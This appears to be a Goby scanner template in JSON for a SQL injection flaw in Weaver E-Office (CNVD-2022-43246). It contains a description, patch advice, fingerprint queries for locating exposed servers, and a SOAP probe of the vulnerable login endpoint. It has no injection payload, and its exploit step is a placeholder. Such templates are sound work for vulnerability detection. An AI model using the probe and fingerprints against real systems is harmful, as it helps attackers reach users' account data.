Goby/json/Weaver-E-Office-SQL-Injecti...


{
"Name": "Weaver E-Office SQL Injection Vulnerability (CNVD-2022-43246)",
"Description": "<p>Weaver E-office is a standard collaborative mobile office platform from Weaver.</p><p>Weaver E-office contains a SQL injection vulnerability that attackers can use to obtain any user's account information, password, mobile phone number, etc. from the system.</p>",
"Product": "E-office",
"Homepage": "https://www.weaver.com.cn/",
"DisclosureDate": "2022-03-27",
"Author": "Lyaa0",
"FofaQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
"GobyQuery": "((header=\"general/login/index.php\" || body=\"/general/login/view//images/updateLoad.gif\" || (body=\"szFeatures\" && body=\"eoffice\") || header=\"Server: eOffice\") && body!=\"Server: couchdb\") || banner=\"general/login/index.php\"",
"Level": "2",
"Impact": "<p>Weaver E-office contains a SQL injection vulnerability through which attackers can obtain any user's information from the system, such as account numbers, encrypted passwords, mobile phone numbers, names, etc. Once a password has been decrypted, the attacker can browse internal OA system information, files, etc.<br></p>",
"Recommendation": "<p>The vendor has released a patch that fixes the vulnerability. Apply the update promptly: <a href=\"https://www.weaver.com.cn/\" target=\"_blank\">https://www.weaver.com.cn/</a><br></p>",
"References": [
"https://www.weaver.com.cn/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/webservice-json/login/login.wsdl.php",
"follow_redirect": true,
"header": {
"Content-Type": "text/xml;charset=UTF-8",
"Accept-Encoding": "gzip, deflate"
},
"data_type": "text",
"data": "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:LoginServicewsdl\">\n <soapenv:Header/>\n <soapenv:Body>\n <urn:GetCurrentInformation soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <UserId xsi:type=\"xsd:string\"></UserId>\n </urn:GetCurrentInformation>\n </soapenv:Body>\n</soapenv:Envelope>"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "GetCurrentInformationResponse",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"SQL Injection"
],
"VulType": [
"SQL Injection"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
"CNVD-2022-43246"
],
"CVSSScore": "7.0",
"Translation": {
"CN": {
"Name": "泛微 E-Office SQL注入漏洞CNVD-2022-43246",
"Product": "E-office",
"Description": "<p>泛微E-office是泛微旗下的一款标准协同移动办公平台。</p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">泛微E-office</span>存在SQL注入漏洞攻击者可利用该漏洞获取系统内任意用户账号信息、密码、手机号等。<br></p>",
"Recommendation": "<p>厂商已发布补丁修复漏洞,请及时更新:<span style=\"color: var(--primaryFont-color);\"><a href=\"https://www.weaver.com.cn/\">https://www.weaver.com.cn/</a></span></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">泛微E-office</span><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">存在SQL注入漏洞</span>攻击者可通过此漏洞获取系统内任意用户信息例如账号、加密密码、手机号、名字等。密码解密后可浏览oa内部系统信息文件等。<br></p>",
"VulType": [
"SQL 注入"
],
"Tags": [
"SQL 注入"
]
},
"EN": {
"Name": "Weaver E-Office SQL Injection Vulnerability (CNVD-2022-43246)",
"Product": "E-office",
"Description": "<p>Weaver E-office is a standard collaborative mobile office platform from Weaver.</p><p>Weaver E-office contains a SQL injection vulnerability that attackers can use to obtain any user's account information, password, mobile phone number, etc. from the system.</p>",
"Recommendation": "<p>The vendor has released a patch that fixes the vulnerability. Apply the update promptly: <a href=\"https://www.weaver.com.cn/\" target=\"_blank\">https://www.weaver.com.cn/</a><br></p>",
"Impact": "<p>Weaver E-office contains a SQL injection vulnerability through which attackers can obtain any user's information from the system, such as account numbers, encrypted passwords, mobile phone numbers, names, etc. Once a password has been decrypted, the attacker can browse internal OA system information, files, etc.<br></p>",
"VulType": [
"SQL Injection"
],
"Tags": [
"SQL Injection"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}